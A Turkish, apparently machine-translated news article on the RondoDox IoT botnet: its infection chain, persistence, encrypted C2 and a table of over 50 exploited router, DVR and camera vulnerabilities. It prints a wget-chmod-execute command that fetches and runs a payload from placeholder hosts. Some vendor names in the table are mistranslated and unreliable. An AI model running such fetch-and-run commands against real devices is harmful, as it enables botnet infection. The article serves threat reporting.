RondoDox, 2025’in başlarında ortaya çıkışından bu yana, tüketici yönlendiricilerinden kurumsal CCTV sistemlerine ve web sunucularına kadar çok çeşitli ağa bağlı cihazları hedef alarak hızla faaliyetteki en yaygın IoT odaklı botnet’lerden biri haline geldi.
Modüler tasarımı, operatörlerin 50’den fazla farklı güvenlik açığına karşı özel yararlanma modüllerini devreye almasına olanak tanıyarak farklı platformların hızla tehlikeye atılmasına olanak tanır.
Pek çok saldırı kampanyasında, saldırganlar açıkta kalan cihazları tespit etmek için otomatik taramadan yararlandı ve bunu hızlı bir şekilde yararlanma ve komuta-kontrol kaydı izledi.
Trend Micro araştırmacıları, birden fazla bölgedeki güvenliği ihlal edilmiş DVR cihazlarından kaynaklanan anormal trafik modellerini gözlemledikten sonra Nisan 2025’te RondoDox’u tespit etti.
Sonraki analiz, Go’da yazılmış, platformlar arası dağıtımı ve verimli ikili boyutu kolaylaştıran bir çekirdek motoru ortaya çıkardı.
Botnet’in komut protokolleri şifreli iletişimi destekleyerek ağ izleme altında bile gizli C2 değişimlerini garanti eder.
Başarılı bir şekilde yararlanmanın ardından RondoDox, cihazın yeniden başlatılmasından ve cihaz yazılımı güncellemelerinden etkilenmeyecek şekilde tasarlanmış hafif bir kalıcılık aracısını devreye alır.
Bu aracı, yeni veriler veya komutlar için C2 sunucularını periyodik olarak yoklarken, kendi kendini onarma rutinleri, kaldırılmışsa bileşenleri yeniden yükler.
Enfeksiyonlar sıklıkla cihazın büyük ölçekli DDoS saldırılarına katılmasıyla veya sonraki tehdit operasyonları için gizli proxy sunuculuğuyla sonuçlanır.
Enfeksiyon Mekanizması
RondoDox’un bulaşma zinciri genellikle, kötü amaçlı yazılımın tarama modülünün cihazları açık Telnet (port 23), SSH (port 22) ve HTTP yönetim arayüzleri için araştırdığı bir keşif aşamasıyla başlar.
Bir hedef belirlendikten sonra, kapsamlı veri havuzundan alınan uygun yararlanma yükü teslim edilir.
Örneğin, bir modülde tarayıcı, bir kabuk yükünü yürütmek için CVE-2021-20090 yönlendirici kimlik doğrulama bypassını kullanır: –
wget http[:]//malicious.example/exploit; chmod +x exploit
./ exploit - u admin - p '' - c ' wget http[:]//cdn[.]example/rondox && chmod +x rondox && ./ rondox'İlk kod yürütülmesinden sonra veri, trafiğini meşru HTTPS olarak gizleyerek 443 numaralı bağlantı noktasında C2’ye şifrelenmiş bir TLS kanalı kurar.
Trend Micro analistleri, bu şifreleme planının özel bir sertifika paketine dayandığını ve bunun da müdahale ve inceleme çabalarını karmaşık hale getirdiğini belirtti.
İletişim kurulduktan sonra bot, ağ tarayıcıları veya DDoS araçları gibi ek modülleri talep eder ve doğrudan belleğe yükler.
Çok aşamalı enfeksiyon akışı, keşiften sömürüye ve kalıcılığa geçişi vurguluyor.
.webp)
RondoDox güvenlik açığının zaman çizelgesi (Kaynak – Trend Micro)
Bulaşma mekanizmasını takiben RondoDox, Linux tabanlı DVR’lerdeki crontab girişleri veya belirli yönlendirici modellerindeki donanım yazılımı görüntüsü değişikliği gibi cihaza özgü kalıcılık tekniklerinden yararlanarak operasyonun devam etmesini sağlar.
Uyarlanabilirliği ve geniş istismar kitaplığı, bu gelişen tehdidi azaltmak için yama yönetimi ve ağ bölümlendirmesine olan acil ihtiyacın altını çiziyor.
Aşağıdaki tablo, CVE tanımlayıcıları, etkilenen ürünler, etki derecelendirmeleri, gerekli yararlanma önkoşulları ve CVSS 3.1 puanları da dahil olmak üzere RondoDox tarafından şu anda istismar edilen 50’den fazla güvenlik açığına ilişkin ayrıntılı bir genel bakış sunmaktadır.
| # | Satıcı / Ürün | CVE Kimliği | CWE / Tür | Durum | Notlar |
|---|---|---|---|---|---|
| 1 | Nexxt Yönlendirici Ürün Yazılımı | CVE-2022-44149 | CWE-78 (Komut Ekleme) | N-Gün | |
| 2 | D-Link Yönlendiricileri | CVE-2015-2051 | CWE-78 | N-Gün | |
| 3 | Netgear R7000 / R6400 | CVE-2016-6277 | CWE-78 | N-Gün | |
| 4 | Netgear (mini_httpd) | CVE-2020-27867 | CWE-78 | N-Gün | |
| 5 | Apache HTTP Sunucusu | CVE-2021-41773 | CWE-22 (Yol Geçişi / RCE) | N-Gün | |
| 6 | Apache HTTP Sunucusu | CVE-2021-42013 | CWE-22 | N-Gün | |
| 7 | TBK DVR’ler | CVE-2024-3721 | CWE-78 | Hedefli | |
| 8 | TOTOLINK (setMtknatCfg) | CVE-2025-1829 | CWE-78 | N-Gün | |
| 9 | Meteobridge web arayüzü | CVE-2025-4008 | CWE-78 | N-Gün | |
| 10 | D-Link DNS-320 | CVE-2020-25506 | CWE-78 | N-Gün | |
| 11 | Digiever DS-2105 Pro | CVE-2023-52163 | CWE-78 | N-Gün | |
| 12 | Netgear DGN1000 | CVE-2024-12847 | CWE-78 | N-Gün | |
| 13 | D-Link (çoklu) | CVE-2024-10914 | CWE-78 | N-Gün | |
| 14 | Edimax RE11S Yönlendirici | CVE-2025-22905 | CWE-78 | N-Gün | |
| 15 | QNAP VIOSTOR NVR | CVE-2023-47565 | CWE-78 | N-Gün | |
| 16 | D-Link DIR-816 | CVE-2022-37129 | CWE-78 | N-Gün | |
| 17 | GNU Bash (ShellShock) | CVE-2014-6271 | CWE-78 (Kod Ekleme) | N-Gün / Tarihsel | |
| 18 | Dasan GPON Ev Yönlendiricisi | CVE-2018-10561 | CWE-287 (Kimlik Doğrulama Baypası) | N-Gün | |
| 19 | Dört Katlı Endüstriyel Yönlendiriciler | CVE-2024-12856 | CWE-78 | N-Gün | |
| 20 | TP-Link Archer AX21 | CVE-2023-1389 | CWE-78 | Hedefli | |
| 21 | D-Link Yönlendiricileri | CVE-2019-16920 | CWE-78 | N-Gün | |
| 22 | İhale (FROMNETTOOLGET) | CVE-2025-7414 | CWE-78 | N-Gün | |
| 23 | Mağaza (cihazAdı) | CVE-2020-10987 | CWE-78 | N-Gün | |
| 24 | LB-LINK Yönlendiriciler | CVE-2023-26801 | CWE-78 | N-Gün | |
| 25 | Linksys E-Serisi | CVE-2025-34037 | CWE-78 | N-Gün | |
| 26 | AVTECH CCTV | CVE-2024-7029 | CWE-78 | N-Gün | |
| 27 | TOTOLINK X2000R | CVE-2025-5504 | CWE-78 | N-Gün | |
| 28 | ZyXEL P660HN-T1A | CVE-2017-18368 | CWE-78 | N-Gün | |
| 29 | Hytec HWL-2511-SS | CVE-2022-36553 | CWE-78 | N-Gün | |
| 30 | Belkin Play N750 | CVE-2014-1635 | CWE-120 (Arabellek Taşması) | N-Gün | |
| 31 | TRENDnet TEW-411BRPplus | CVE-2023-51833 | CWE-78 | N-Gün | |
| 32 | TP-Link TL-WR840N | CVE-2018-11714 | CWE-78 | N-Gün | |
| 33 | D-Link DIR820LA1 | CVE-2023-25280 | CWE-78 | N-Gün | |
| 34 | Milyar 5200W-T | CVE-2017-18369 | CWE-78 | N-Gün | |
| 35 | Cisco (birden fazla ürün) | CVE-2019-1663 | CWE-119 (Bellek Bozulması) | N-Gün | |
| 36 | TOTOLINK (setWizardCfg) | CVE-2024-1781 | CWE-78 | N-Gün | |
| 37 | Hikvision NVR’si | — | Komut Enjeksiyonu | CVE yok | Trend Micro tarafından CVE olmadan listelenmiştir |
| 38 | Dahua DVR | — | Uzaktan Kod Yürütme | CVE yok | Trend Micro tarafından CVE olmadan listelenmiştir |
| 39 | Wavlink Yönlendiricileri | — | CWE-78 | CVE yok | Trend Micro tarafından CVE olmadan listelenmiştir |
| 40 | ZTE ZXHN Yönlendirici | — | CWE-78 | CVE yok | Trend Micro tarafından CVE olmadan listelenmiştir |
| 41 | Seenergy NVR | — | Kimlik Doğrulama Baypası | CVE yok | Trend Micro tarafından CVE olmadan listelenmiştir |
| 42 | Uniview NVR | — | CWE-78 | CVE yok | Trend Micro tarafından CVE olmadan listelenmiştir |
| 43 | TP-Link TD-W8960N | — | CWE-78 | CVE yok | Trend Micro tarafından CVE olmadan listelenmiştir |
| 44 | Dahua IP Kamera | — | CWE-78 | CVE yok | Trend Micro tarafından CVE olmadan listelenmiştir |
| 45 | HiSilicon Aygıt Yazılımı | — | Arabellek Taşması | CVE yok | Trend Micro tarafından CVE olmadan listelenmiştir |
| 46 | Amcrest Kamera | — | CWE-78 | CVE yok | Trend Micro tarafından CVE olmadan listelenmiştir |
| 47 | Hikvision IP Kamera | — | CWE-78 | CVE yok | Trend Micro tarafından CVE olmadan listelenmiştir |
| 48 | LILIN Kamera | — | CWE-78 | CVE yok | Trend Micro tarafından CVE olmadan listelenmiştir |
| 49 | TP-Link WR941N | — | CWE-78 | CVE yok | Trend Micro tarafından CVE olmadan listelenmiştir |
| 50 | Wavlink WL-WN575A3 | — | CWE-78 | CVE yok | Trend Micro tarafından CVE olmadan listelenmiştir |
| 51 | Dahua NVR’si | — | CWE-78 | CVE yok | Trend Micro tarafından CVE olmadan listelenmiştir |
| 52 | Çadır AC6 | — | CWE-78 | CVE yok | Trend Micro tarafından CVE olmadan listelenmiştir |
| 53 | Hikvision DS-7108HGHI | — | CWE-78 | CVE yok | Trend Micro tarafından CVE olmadan listelenmiştir |
| 54 | LB-LINK BL-WR450H | — | CWE-78 | CVE yok | Trend Micro tarafından CVE olmadan listelenmiştir |
| 55 | ZTE ZXHN H108N | — | CWE-78 | CVE yok | Trend Micro tarafından CVE olmadan listelenmiştir |
| 56 | Wavlink WL-WN531G3 | — | CWE-78 | CVE yok | Trend Micro tarafından CVE olmadan listelenmiştir |
Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.
